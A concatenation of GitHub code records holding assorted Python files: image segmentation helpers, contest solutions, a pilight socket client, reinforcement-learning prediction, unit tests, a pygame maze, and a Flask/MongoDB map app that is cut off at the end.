axs.ravel()\n for i in range(number_of_clusters):\n segment = self.__segments(img,labels,i)\n axs[i].imshow(segment)\n axs[i].set_title('segment'+str(i)) \n plt.savefig('Plots/Segments/'+name+str(number_of_clusters)+'.jpg')\n \n def dispKmeansBruteImg(self,reconstructedImg,l,plt_name):\n M,N = len(reconstructedImg)//2,2\n fig, axs = plt.subplots(M,N, figsize=(60, 60), facecolor='w', edgecolor='k',squeeze=True)\n fig.subplots_adjust(hspace = 0.1, wspace=.01)\n axs = axs.ravel()\n for i in range(len(reconstructedImg)):\n axs[i].imshow(reconstructedImg[i])\n axs[i].set_title('K_'+str(i+l)) \n plt.savefig('Plots/Kmeans/'+plt_name+'.jpg')\n plt.show()\n \n def plotLoss(self,Loss,plt_name):\n plt.plot(Loss)\n plt.savefig('Plots/Kmeans/Loss_'+plt_name+'.jpg') \n plt.show() \n \n \n \nclass imgLibs:\n \n def __init__(self,imgName,clrSpace='rgb'):\n self.img = np.load(imgName)\n self.imgShape = self.img.shape\n self.clrSpace = clrSpace\n \n def loadImg(self):\n self.img[np.isnan(self.img)] = 0\n if self.clrSpace =='rgb':\n return self.img\n elif self.clrSpace == 'hsv':\n return cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV)\n elif self.clrSpace == 'gray':\n return cv2.cvtColor(self.img,cv2.COLOR_BGR2GRAY)\n \n \n\n ","repo_name":"TejasPanambur/Segmentation-of-Martian-Terrain-using-Clustering-Algortims","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":7283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23557867641","text":"infile=open('B-large.in','r')\noutfile=open('B-large-output.in','a')\n\nfirst=True\nl=0\nfor line in infile:\n impossible=False\n l=l+1\n if first==True:\n first=False\n continue\n line=line.split(\" \")\n untidy=list(line[0])\n for t in range(len(untidy)-1):\n change=False\n for i in range(len(untidy)-1):\n if len(untidy)==2:\n break\n if change==True:\n untidy[i]=str(9)\n continue\n if untidy[i+1]=='\\n':\n break\n if int(untidy[i])>int(untidy[i+1]):\n untidy[i]=str(int(untidy[i])-1)\n untidy[i+1]='9'\n change=True\n continue\n\n outfile.write('Case #'+str(l-1)+': '+str(int(''.join(untidy)))+'\\n')\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/3196.py","file_name":"3196.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16507081683","text":"from collections import defaultdict\nimport sys\nimport numpy as np\nfrom multiagent.policy.random import RandomPolicy\n\ndef mc_prediction_execution(env, num_episodes=100, discount_factor=1.0):\n \"\"\"\n Monte Carlo prediction algorithm. Calculates the value function\n for a given policy using sampling.\n \n Args:\n env: OpenAI gym environment.\n num_episodes: Nubmer of episodes to sample.\n discount_factor: Lambda discount factor.\n \n Returns:\n A dictionary that maps from state -> value.\n The state is a tuple and the value is a float.\n \"\"\"\n\n # Keeps track of sum and count of returns for each state\n # to calculate an average. We could use an array to save all\n # returns (like in the book) but that's memory inefficient.\n returns_sum = defaultdict(float)\n returns_count = defaultdict(float)\n \n # The final value function\n V = defaultdict(float)\n policies = [RandomPolicy(env,i) for i in range(env.n)]\n for i_episode in range(1, num_episodes + 1):\n # Print out which episode we're on, useful for debugging.\n if i_episode % 10 == 0:\n print(\"\\rEpisode {}/{}.\".format(i_episode, num_episodes), end=\"\")\n sys.stdout.flush()\n\n # Generate an episode.\n # An episode is an array of (state, action, reward) tuples\n episode = []\n state = env.reset()\n for t in range(100):\n # probs = policy(state)\n # action = np.random.choice(np.arange(len(probs)), p=probs)\n action = []\n for i, policy in enumerate(policies):\n action.append(policy.action(state[i]))\n next_state, reward, done, _ = env.step(action)\n episode.append((state, action, reward))\n if done[0]:\n break\n state = next_state\n\n # Find all states that we've visited in this episode\n # We convert each state to a tuple so that we can use it as a dict key\n\n states_in_episode = [x[0] for x in episode]\n for state in states_in_episode:\n\n # Find the first occurance of the state in the episode\n first_occurence_idx = next(i for i,x in enumerate(episode) if np.array(x[0]).all() == state[0].all())\n # Sum up all rewards since the first occurance\n G = sum(x[2][0] for x in episode[first_occurence_idx:])\n # Calculate average return for this state over all sampled episodes\n returns_sum[tuple(state[0])] += G\n returns_count[tuple(state[0])] += 1.0\n V[tuple(state[0])] = returns_sum[tuple(state[0])] / returns_count[tuple(state[0])]\n\n # print(V)\n return V","repo_name":"darshil333/CSE574","sub_path":"multiagent/execution/mc_prediction.py","file_name":"mc_prediction.py","file_ext":"py","file_size_in_byte":2680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40041636126","text":"#!/usr/bin/env python\n\"\"\"utils_tests.py: Some correctness tests\"\"\"\nfrom __future__ import absolute_import, division, print_function, unicode_literals\n__author__ = \"Fabien Cromieres\"\n__license__ = \"undecided\"\n__version__ = \"1.0\"\n__email__ = \"fabien.cromieres@gmail.com\"\n__status__ = \"Development\"\n\nimport numpy as np\nimport chainer\nfrom chainer import Link, Chain, ChainList, Variable\nimport chainer.functions as F\nimport chainer.links as L\n\nimport nmt_chainer.models as models\nimport nmt_chainer.utilities.utils as utils\n\n\nfrom nmt_chainer.__main__ import main\nfrom nmt_chainer.utilities.utils import de_batch\n\n\nclass TestDeBatch:\n def test_multiple_length(self):\n batch = [np.array([1, 3, 4, 8]), np.array([1, 5, 6, 9]), np.array([7, 5]), np.array([10])]\n seq_list = de_batch(batch)\n\n assert seq_list == [[1, 1, 7, 10], [3, 5, 5], [4, 6], [8, 9]]\n\n def test_multiple_length_variable(self):\n batch = [Variable(np.array(x, dtype=np.int32)) for x in [[1, 3, 4, 8], [1, 5, 6, 9], [7, 5], [10]]]\n seq_list = de_batch(batch, is_variable=True)\n\n assert seq_list == [[1, 1, 7, 10], [3, 5, 5], [4, 6], [8, 9]]\n\n def test_multiple_length_variable_raw(self):\n batch = [Variable(np.array(x, dtype=np.int32)) for x in [[1, 3, 4, 8], [1, 5, 6, 9], [[7, 9], [5, 8]], [10]]]\n seq_list = de_batch(batch, is_variable=True, raw=True)\n assert len(seq_list) == 4\n for seq1, seq2 in zip(seq_list, [[1, 1, [7, 9], 10], [3, 5, [5, 8]], [4, 6], [8, 9]]):\n assert len(seq1) == len(seq2)\n for elem1, elem2 in zip(seq1, seq2):\n assert np.all(elem1 == elem2)\n\n def test_multiple_length_eos_idx(self):\n batch = [np.array([1, 3, 4, 8]), np.array([3, 3, 6, 9]), np.array([7, 5]), np.array([10])]\n seq_list = de_batch(batch, eos_idx=3)\n assert seq_list == [[1, 3], [3], [4, 6], [8, 9]]\n\n def test_mask1(self):\n batch = [np.array([1, 3, 4, 8]), np.array([1, 5, 6, 9]), np.array([7, 5, 3, 4])]\n mask = [np.array([True, True, True, True]), np.array([True, True, True, True]), np.array([True, True, True, True])]\n seq_list = de_batch(batch, mask=mask)\n assert seq_list == [[1, 1, 7], [3, 5, 5], [4, 6, 3], [8, 9, 4]]\n\n def test_mask2(self):\n batch = [np.array([1, 3, 4, 8]), np.array([1, 5, 6, 9]), np.array([7, 5, 3, 4])]\n mask = [np.array([True, True, True, True]), np.array([True, True, False, True]), np.array([True, True, False, False])]\n seq_list = de_batch(batch, mask=mask)\n assert seq_list == [[1, 1, 7], [3, 5, 5], [4], [8, 9]]\n\n def test_mask3(self):\n batch = [np.array([1, 3, 4, 8]), np.array([1, 5, 6, 9]), np.array([7, 5, 3, 4])]\n mask = [np.array([True, True, False, True]), np.array([True, True, False, False])]\n seq_list = de_batch(batch, mask=mask)\n assert seq_list == [[1, 1, 7], [3, 5, 5], [4], [8, 9]]\n# print(seq_list)\n# print(seq_list == [[1,1,[7,9],10], [3,5,[5,8]], [4,6], [8,9]])\n# assert np.all(seq_list == [[1,1,[7,9],10], [3,5,[5,8]], [4,6], [8,9]])\n\n\nimport nmt_chainer.dataprocessing.make_data as make_data\nimport nmt_chainer.training_module.train as train\nimport os.path\n\n# test_data_dir = \"tests_data\"\n\n\nclass TestMakeData:\n def test_data_creation(self, tmpdir, gpu):\n test_data_dir = os.path.join(\n os.path.dirname(\n os.path.abspath(__file__)),\n \"../tests_data\")\n train_dir = tmpdir.mkdir(\"train\")\n data_prefix = str(train_dir.join(\"test1.data\"))\n train_prefix = str(train_dir.join(\"test1.train\"))\n args = [\"make_data\", os.path.join(test_data_dir, \"src2.txt\"), os.path.join(test_data_dir, \"tgt2.txt\"), data_prefix]\n main(arguments=args)\n\n args_train = [\"train\", data_prefix, train_prefix] + \"--max_nb_iters 5 --mb_size 2 --Ei 10 --Eo 12 --Hi 30 --Ha 70 --Ho 15 --Hl 23\".split(\" \")\n if gpu is not None:\n args_train += ['--gpu', gpu]\n main(arguments=args_train)\n","repo_name":"fabiencro/knmt","sub_path":"tests/suite1/utils_test.py","file_name":"utils_test.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"61"} +{"seq_id":"69803632516","text":"values = []\r\ndiffs = []\r\nfor i in range(int(input())):\r\n values.append([int(a) for a in input().split()])\r\nvalues.sort(key=lambda v: v[0])\r\n# print(values)\r\nfor i in range(1, len(values)):\r\n t0, s0 = values[i-1]\r\n t1, s1 = values[i]\r\n # print(s0, s1, t0, t1,(s1-s0)/(t1-t0))\r\n diffs.append(abs((s1-s0)/(t1-t0)))\r\nprint(max(diffs))\r\n","repo_name":"Cynthia7979/CCC-prep","sub_path":"2020/S1.py","file_name":"S1.py","file_ext":"py","file_size_in_byte":347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"1729510123","text":"\"\"\"This module implements a client to interface the pilight-daemon.\n\nMore information about pilight is here: https://www.pilight.org/.\n\"\"\"\n\nimport threading\nimport socket\nimport json\nimport logging\nimport time\n\n\nclass Client(threading.Thread):\n\n \"\"\"This client interfaces with the pilight-daemon (https://www.pilight.org/).\n\n Sending and receiving codes is implemented in an asychronous way.\n A callback function can be defined that reacts on received data.\n\n All pilight-send commands can be used by this client. Documentation\n can be found here https://wiki.pilight.org/doku.php/psend.\n Also check https://manual.pilight.org/en/api.\n\n :param host: Address where the pilight-daemon intance runs\n :param port: Port of the pilight-daemon on the host\n :param timeout: Time until a time out exception is raised when connecting\n :param recv_ident: The identification of the receiver to sucribe\n to the pilight-daemon topics (https://manual.pilight.org/en/api)\n :param recv_codes_only: If True: only call the callback function when the\n pilight-daemon received a code, not for status messages etc.\n :param veto_repeats: If True: only call the callback function when the\n pilight-daemon received a new code, not the same code repeated.\n Repeated codes happen quickly when a button is pressed.\n \"\"\"\n\n # pylint: disable=too-many-arguments, too-many-instance-attributes\n\n # How many seconds to wait before trying to reconnect\n RECONNECT_WAIT_SEC = 1\n\n def __init__(self, host='127.0.0.1', port=5000, timeout=1,\n recv_ident=None, recv_codes_only=True, veto_repeats=True):\n \"\"\"Initialize the pilight client.\n\n The readout thread is not started automatically.\n \"\"\"\n threading.Thread.__init__(self)\n self.daemon = True\n self._stop_thread = threading.Event()\n self._lock = threading.Lock()\n self.recv_ident = recv_ident\n self.recv_codes_only = recv_codes_only\n self.veto_repeats = veto_repeats\n\n self.host = host\n self.port = port\n self.timeout = timeout\n\n # Open 2 socket connections, one for sending one for receiving data\n # That is the simplest approach to allow asynchronus communication with\n # the pilight daemon\n self.connect_sender()\n self.connect_receiver()\n\n # Timeout to allow receiver thread termination and to restrict blocking\n # connection time\n self.callback = None\n\n def connect_receiver(self):\n if self.recv_ident:\n client_identification_receiver = self.recv_ident\n else:\n client_identification_receiver = {\n \"action\": \"identify\",\n \"options\": {\n \"core\": 0, # To get CPU load and RAM of pilight daemon\n # To receive the RF data received by pilight\n \"receiver\": 1,\n \"config\": 0,\n \"forward\": 0\n }\n }\n\n self.receive_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.receive_socket.settimeout(self.timeout)\n self.receive_socket.connect((self.host, self.port))\n # Identify this clients sockets at the pilight-deamon\n self.receive_socket.send(\n json.dumps(client_identification_receiver).encode())\n answer = json.loads(self.receive_socket.recv(1024).decode())\n # Check connections are acknowledged\n if ('success' not in answer['status']):\n raise IOError(\n 'Connection to the pilight daemon failed. Reply %s',\n answer)\n\n def connect_sender(self):\n # Identify client (https://manual.pilight.org/en/api)\n client_identification_sender = {\n \"action\": \"identify\",\n \"options\": {\n # To get CPU load and RAM of pilight daemon, is neverless\n # ignored by daemon ...\n \"core\": 0,\n \"receiver\": 0, # To receive the RF data received by pilight\n \"config\": 0\n }\n }\n\n self.send_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.send_socket.settimeout(self.timeout)\n self.send_socket.connect((self.host, self.port))\n self.send_socket.send(\n json.dumps(client_identification_sender).encode())\n answer = json.loads(self.send_socket.recv(1024).decode())\n if ('success' not in answer['status']):\n raise IOError(\n 'Connection to the pilight daemon failed. Reply %s',\n answer)\n\n \n def set_callback(self, function):\n \"\"\"Function to be called when data is received.\"\"\"\n self.callback = function\n\n def stop(self):\n \"\"\"Called to stop the reveiver thread.\"\"\"\n self._stop_thread.set()\n # f you want to close the connection in a timely fashion,\n # call shutdown() before close().\n with self._lock: # Receive thread might use the socket\n self.receive_socket.shutdown(socket.SHUT_RDWR)\n self.receive_socket.close()\n\n self.send_socket.shutdown(socket.SHUT_RDWR)\n self.send_socket.close()\n\n def run(self):\n # \"Watchdog\" thread\n watchdog_thread = threading.Thread(target=self._watchdog, name=\"watchdog\")\n try:\n watchdog_thread.start()\n self._run()\n finally:\n self._stop_thread.set()\n watchdog_thread.join()\n return 0\n\n def try_sendall_with_reconnect(self, message):\n try:\n self.send_socket.sendall(message)\n except(socket.error):\n time.sleep(self.RECONNECT_WAIT_SEC)\n self.connect_sender()\n self.send_socket.send(message)\n\n def _watchdog(self):\n # check pilight connection every 100ms\n while True:\n time.sleep(0.100)\n self.try_sendall_with_reconnect('HEART\\n'.encode())\n answer = self.send_socket.recv(1024).decode()\n if not (answer.startswith('BEAT')):\n logging.debug('Heartbeat lost, reconnecting...')\n time.sleep(self.RECONNECT_WAIT_SEC)\n self.connect_sender()\n self.connect_receiver()\n\n def _run(self): # Thread for receiving data from pilight\n \"\"\"Receiver thread function called on Client.start().\"\"\"\n logging.debug('Pilight receiver thread started')\n if not self.callback:\n raise RuntimeError('No callback function set, cancel readout thread')\n\n def handle_messages(messages):\n \"\"\"Call callback on each receive message.\"\"\"\n for message in messages: # Loop over received messages\n if message: # Can be empty due to splitlines\n message_dict = json.loads(message.decode())\n if self.recv_codes_only:\n # Filter: Only use receiver messages\n if 'receiver' in message_dict['origin']:\n if self.veto_repeats:\n if message_dict['repeats'] == 1:\n self.callback(message_dict)\n else:\n self.callback(message_dict)\n else:\n self.callback(message_dict)\n\n while not self._stop_thread.isSet():\n try: # Read socket in a non blocking call and interpret data\n # Sometimes more than one JSON object is in the stream thus\n # split at \\n\n with self._lock:\n messages = self.receive_socket.recv(1024).splitlines()\n handle_messages(messages)\n # FIXME handle lost connection -> reconnect\n except (socket.timeout, ValueError): # No data\n pass\n logging.debug('Pilight receiver thread stopped')\n\n def send_code(self, data, acknowledge=True):\n \"\"\"Send a RF code known to the pilight-daemon.\n\n For protocols look at https://manual.pilight.org/en/api.\n When acknowledge is set, it is checked if the code was issued.\n :param data: Dictionary with the data\n :param acknowledge: Raise IO exception if the code is not\n send by the pilight-deamon\n \"\"\"\n if \"protocol\" not in data:\n raise ValueError(\n 'Pilight data to send does not contain a protocol info. '\n 'Check the pilight-send doku!', str(data))\n\n # Create message to send\n message = {\n \"action\": \"send\", # Tell pilight daemon to send the data\n \"code\": data,\n }\n\n # If connection is closed IOError is raised\n self.try_sendall_with_reconnect(json.dumps(message).encode())\n \n if acknowledge: # Check if command is acknowledged by pilight daemon\n messages = self.send_socket.recv(1024).splitlines()\n received = False\n for message in messages: # Loop over received messages\n if message: # Can be empty due to splitlines\n acknowledge_message = json.loads(message.decode())\n # Filter correct message\n if ('status' in acknowledge_message and\n acknowledge_message['status'] == 'success'):\n received = True\n if not received:\n raise IOError('Send code failed. Code: %s', str(data))\n","repo_name":"DavidLP/pilight","sub_path":"pilight/pilight.py","file_name":"pilight.py","file_ext":"py","file_size_in_byte":9555,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"9668259650","text":"#Creamos la lista llamada \"Array\"\nArray = []\n\n#Usamos la funcion append para ingresar un valor al final de la lista\nArray.append(\"Lissette\")\nArray.append(\"Francisco\")\n\n#Usamos la funcion insert(posicion, valor) donde posicion es la posicion en donde ingresaremos el dato y valor es el dato a ingresar\nArray.insert(2, \"Matias\")\n\n#Usamos la funcion extend para ingresar mas de un valor al final de la lista\nArray.extend([\"Javier\",\"Carolina\",\"Alejandro\"])\n\nprint(Array)\n#Para borrar el dato de la ultima posicion de la lista\nArray.pop()\n\nprint(Array)\n#Para borrar el dato de una posicion exacta se usa pop(posicion)\n#donde posicion se remplaza por la posicion del dato a eliminar\nArray.pop(3)\nArray.pop(3)\n\n#Para borrar exactamente un dato se usa remove(dato)\n#donde dato se remplaza por el dato a borrar\nArray.remove(\"Matias\")\n\n#Invertir el orden de la lista\nArray.reverse()\n\n#Ordenar los datos de la tupla de manera ascendente \nArray.sort()\n\n#Ordenar los datos de la tupla de manera descendente\nArray.sort(reverse=True)\n\n#Para contar cuantas veces esta algun dato en la lista se usa count(dato)\n#donde dato lo remplazamos por el dato a buscar\nprint(Array.count(\"Francisco\"))\n\n#Para encontrar en que posicion se encuentra un dato usamos la funcion index(dato)\n#donde dato lo remplazamos por el dato a buscar la posicion\nprint(Array.index(\"Lissette\"))\n\nprint(Array)\n\n#Para concatenar dos listas usamos la siguiente sintaxis\nArray2 = Array + Array\nprint(Array2)\n\n","repo_name":"Matias-Gutierrez/practica-con-python","sub_path":"1°Semestre/Clase k/tuplas.py","file_name":"tuplas.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33594359797","text":"#!/usr/bin/env python3\n\nfrom dataset import Dataset, Camera\nimport cv2\nimport sys\nfrom argparse import ArgumentParser\nfrom test import test\n\n\ndef cli_callback(args):\n if not args.output and not args.plot and not args.camera:\n args.plot = True\n dataset = Dataset(\"./data\", args.dataset)\n if args.detector == \"FAST\":\n detector = cv2.FastFeatureDetector_create(threshold=25, nonmaxSuppression=True)\n elif args.detector == \"ORB\":\n detector = cv2.ORB_create()\n elif args.detector == \"SIFT\":\n detector = cv2.SIFT_create()\n test(dataset, detector, args.plot, args.camera, args.output)\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\n \"--dataset\", \"-d\", default=\"00\", help=\"dataset id (e.g. 00, 01, etc)\"\n )\n parser.add_argument(\n \"--detector\",\n \"-D\",\n default=\"FAST\",\n help=\"feature detector (FAST [default], ORB, SURF)\",\n )\n parser.add_argument(\"--output\", \"-o\", help=\"trajectory output file (PNG)\")\n parser.add_argument(\n \"--plot\", \"-p\", default=False, action=\"store_true\", help=\"plot the trajectory\"\n )\n parser.add_argument(\n \"--camera\", \"-c\", default=False, action=\"store_true\", help=\"show camera frames\"\n )\n\n parser.set_defaults(func=cli_callback)\n\n args = parser.parse_args()\n args.func(args)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"veracioux/monocular-vo","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41263522834","text":"from pygame import *\n'''Необходимые классы'''\n#класс-родитель для спрайтов \nclass GameSprite(sprite.Sprite):\n #конструктор класса\n def __init__(self, player_image, x, y, speed, hero_size):\n super().__init__()\n \n # каждый спрайт должен хранить свойство image - изображение\n self.image = transform.scale(image.load(player_image), hero_size)\n self.speed = speed\n # каждый спрайт должен хранить свойство rect - прямоугольник, в который он вписан\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n def change_image(self, new_image, new_size):\n center = self.rect.center\n self.image = transform.scale(image.load(new_image), new_size)\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n def reset(self):\n window.blit(self.image, (self.rect.x, self.rect.y))\n#класс-наследник для спрайта-игрока (управляется стрелками)\nclass Player(GameSprite):\n def update(self):\n keys = key.get_pressed()\n x, y = self.rect.x, self.rect.y\n if keys[K_LEFT] and self.rect.x > 5:\n self.rect.x -= self.speed\n if keys[K_RIGHT] and self.rect.x < win_width - 80:\n self.rect.x += self.speed\n if keys[K_UP] and self.rect.y > 5:\n self.rect.y -= self.speed\n if keys[K_DOWN] and self.rect.y < win_height - 80:\n self.rect.y += self.speed\n if sprite.spritecollide(self, walls, dokill=False):\n self.rect.x, self.rect.y = x, y\n if keys[K_p]:\n print(\"x = \", self.rect.centerx, 'y = ', self.rect.centery)\n time.delay(500)\n#класс-наследник для спрайта-врага (перемещается сам)\nclass Enemy(GameSprite):\n def __init__(self, player_image, x, y, speed, hero_size, direction, left, right):\n super().__init__(player_image, x, y, speed, hero_size)\n self.direction = direction\n self.left = left\n self.right = right\n def update(self):\n if self.rect.x <= self.left:\n self.direction = \"right\"\n elif self.rect.x >= self.right:\n self.direction = \"left\"\n\n if self.direction == \"left\":\n self.rect.x -= self.speed\n else:\n self.rect.x += self.speed\n# класс для стен, особенность - изображение прямоугольник\nclass Wall(sprite.Sprite):\n def __init__(self, x, y, width, height):\n super().__init__()\n self.image = Surface((width, height))\n self.image.fill(GREEN)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\ninit()\n\n#Игровая сцена:\nwin_width, win_height = 1600, 800\nwindow = display.set_mode((win_width, win_height))\ndisplay.set_caption(\"Maze\")\n\n# Создаем фоновое изображение по размеру окна\nbackground = transform.scale(image.load(\"background.jpg\"), (win_width, win_height))\n\n#Персонажи игры:\nhero_size = 60, 60\nplayer = Player('hero.png', x=5, y=win_height - 80, speed=4, hero_size=hero_size)\nmonsters = sprite.Group()\nmonsters.add(Enemy('cyborg.png', x=1460 - 80, y=280, speed=2 , hero_size=hero_size,\n direction='left', left=470, right=1460 - 80))\nmonsters.add(Enemy('cyborg.png', x=900, y=450, speed=2 , hero_size=hero_size,\n direction='left', left=470, right=900))\nfinal = GameSprite('treasure.png', x=win_width - 120, y=win_height - 80,\n speed=0 , hero_size=hero_size)\n\n# Стены\nGREEN = (20, 230, 20)\nwalls = sprite.Group()\nwalls.add(Wall(x=80, y=100, width=520, height=10))\nwalls.add(Wall(x=460, y=100, width=10, height=400))\nwalls.add(Wall(x=1080, y=100, width=520, height=10))\nwalls.add(Wall(x=1460, y=100, width=10, height=400))\nwalls.add(Wall(x=580, y=400, width=520, height=10))\nwalls.add(Wall(x=960, y=400, width=10, height=400))\nwalls.add(Wall(x=250, y=300, width=200, height=10))\n\n#музыка\nmixer.init()\nmixer.music.load('jungles.ogg')\nmixer.music.set_volume(0.3)\nmixer.music.play()\n\n# переменные для управления игровым циклом\ngame = True\nfinish = False\nclock = time.Clock()\nFPS = 60 # задаем обновление экрана в кадрах в секунду\nwhile game:\n for e in event.get():\n if e.type == QUIT:\n game = False\n \n if finish != True:\n window.blit(background,(0, 0))\n walls.draw(window)\n player.update()\n monsters.update()\n final.reset() \n monsters.draw(window)\n player.reset()\n \n display.update()\n clock.tick(FPS)","repo_name":"Pavel-Bylkov/lessons","sub_path":"algo/PyGameStart/labirint/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":4902,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"28003746250","text":"from django.template import loader, RequestContext\n\nfrom plugins.disqus import plugin_settings\nfrom utils import models, setting_handler\n\n\ndef inject_disqus(context):\n request = context.get('request')\n plugin = models.Plugin.objects.get(name=plugin_settings.SHORT_NAME)\n disqus_shortname = setting_handler.get_plugin_setting(plugin, 'disqus_shortname', request.journal)\n disqus_enabled = setting_handler.get_plugin_setting(plugin, 'disqus_enabled', request.journal)\n\n if not disqus_enabled.value:\n return\n\n template = loader.get_template('disqus/inject.html')\n disqus_context = {'disqus_shortname': disqus_shortname.processed_value}\n html_content = template.render(disqus_context)\n\n return html_content\n","repo_name":"BirkbeckCTP/disqus","sub_path":"hooks.py","file_name":"hooks.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13000610193","text":"import focus_stack\r\nimport unittest\r\nimport os\r\nimport json\r\n\r\nTESTDATA_FILENAME = os.path.join(os.path.dirname(__file__), 'test_metadata.json')\r\n\r\n# Configuration to produce expected stacks from the test data\r\nTEST_CONFIG = {\r\n 'timestamp_threshold_sec': '0.5',\r\n 'continuous_drive': '0',\r\n 'min_stack_size': '2'\r\n}\r\n\r\nEXPECTED_STACKS = [\r\n \"2023-08-13_18-09-33__IMG_8783-IMG_8882__100\",\r\n \"2023-08-13_18-10-17__IMG_8883-IMG_8982__100\",\r\n \"2023-08-13_18-12-46__IMG_8983-IMG_9002__020\",\r\n \"2023-08-13_18-13-26__IMG_9003-IMG_9062__060\",\r\n \"2023-08-13_18-14-15__IMG_9063-IMG_9122__060\",\r\n \"2023-08-13_18-19-17__IMG_9127-IMG_9136__010\",\r\n \"2023-08-13_18-20-14__IMG_9137-IMG_9146__010\"\r\n]\r\n\r\nclass TestFocusStack(unittest.TestCase):\r\n\r\n def setUp(self):\r\n self.testfile = open(TESTDATA_FILENAME)\r\n self.testdata = json.load(self.testfile)\r\n\r\n def tearDown(self):\r\n self.testfile.close()\r\n\r\n \"\"\"\r\n Test focus stack search\r\n \"\"\"\r\n def test_search_stacks(self):\r\n stacks = focus_stack.search(self.testdata, TEST_CONFIG[\"timestamp_threshold_sec\"], TEST_CONFIG[\"continuous_drive\"], TEST_CONFIG[\"min_stack_size\"] )\r\n self.assertEqual(len(stacks), 7)\r\n stack_labels = [focus_stack.get_stack_label(s) for s in stacks]\r\n self.assertListEqual(stack_labels, EXPECTED_STACKS)\r\nif __name__ == '__main__':\r\n unittest.main()","repo_name":"rkelkka/stackfinder","sub_path":"tests/test_focus_stack.py","file_name":"test_focus_stack.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32408102085","text":"import flask\nimport json\nfrom flask import Flask, render_template, jsonify, request\nimport pymongo\nimport time\n\n\n# To run the program: FLASK_APP=main.py flask run\n\napp = Flask(__name__)\nclient = pymongo.MongoClient()\nrepo = client.repo\nrepo.authenticate('cyyan_liuzirui_yjunchoi_yzhang71', 'cyyan_liuzirui_yjunchoi_yzhang71')\n\n@app.route('/')\ndef hello():\n return render_template('home.html')\n\n@app.route('/marker')\ndef getMarker():\n marker = json.load(open('latlng.json', 'r'))\n return jsonify(marker)\n\n@app.route('/map', methods = ['POST'])\ndef map():\n wardname = request.form.get('ward')\n drop = request.form.get('dropdown')\n\n l = []\n loc = []\n dLoc = {}\n\n if drop == 'Original':\n pLocation = repo['cyyan_liuzirui_yjunchoi_yzhang71.pollingLocation'].find()\n if wardname == \"All\":\n for p in pLocation:\n for i in range(len(p['coordinates'])):\n l = [p['coordinates'][i][1], p['coordinates'][i][0]]\n loc.append(l)\n else:\n for p in pLocation:\n if p['Ward'] == int(wardname):\n for i in range(len(p['coordinates'])):\n l = [p['coordinates'][i][1], p['coordinates'][i][0]]\n loc.append(l)\n elif drop == 'Transit':\n public = repo['cyyan_liuzirui_yjunchoi_yzhang71.optByPublicT'].find()\n dLoc[0] = public[0]\n if wardname == \"All\":\n for i in range(1, len(public[0])):\n for o in dLoc[0][str(i)]:\n l = [o[1], o[0]]\n loc.append(l)\n else:\n for o in dLoc[0][wardname]:\n l = [o[1], o[0]]\n loc.append(l)\n elif drop == \"MBTA\":\n public = repo['cyyan_liuzirui_yjunchoi_yzhang71.optByMBTA'].find()\n dLoc[0] = public[0]\n if wardname == \"All\":\n for i in range(1, len(public[0])):\n for o in dLoc[0][str(i)]:\n l = [o[1], o[0]]\n loc.append(l)\n else:\n for o in dLoc[0][wardname]:\n l = [o[1], o[0]]\n loc.append(l)\n elif drop == \"BUS\":\n public = repo['cyyan_liuzirui_yjunchoi_yzhang71.optByBusstop'].find()\n dLoc[0] = public[0]\n if wardname == \"All\":\n for i in range(1, len(public[0])):\n for o in dLoc[0][str(i)]:\n l = [o[1], o[0]]\n loc.append(l)\n else:\n for o in dLoc[0][wardname]:\n l = [o[1], o[0]]\n loc.append(l)\n else:\n print('Something wrong with dropdown')\n\n result = {}\n\n for i in range(len(loc)):\n result[str(i)] = loc[i]\n\n with open('latlng.json', 'w') as makeFile:\n json.dump(result, makeFile)\n\n marker = getMarker()\n time.sleep(0.2)\n return render_template('map.html')\n\n\n@app.route('/score', methods = ['GET', 'POST'])\ndef score_board():\n if request.method == 'POST':\n drop1 = request.form.get('dropdown1')\n drop2 = request.form.get('dropdown2')\n print(\"this is drop1\", drop1)\n print(\"this is drop2\", drop2)\n\n NewDrop1 = score_drop(drop1)\n NewDrop2 = score_drop(drop2)\n\n if NewDrop1 == \"error\" or NewDrop2 == \"error\":\n print('Something wrong with dropdown')\n\n #Converted latlng to miles\n scoring = []\n scoring.append({\"Mean\":1.035, \"STDDEV\":0.828, \"lowCI95\":0.069, \"upperCI95\":2.967})\n scoring.append({\"Mean\":0.828, \"STDDEV\":0.690, \"lowCI95\":0.069, \"upperCI95\":2.553})\n scoring.append({\"Mean\":0.966, \"STDDEV\":0.828, \"lowCI95\":0.069, 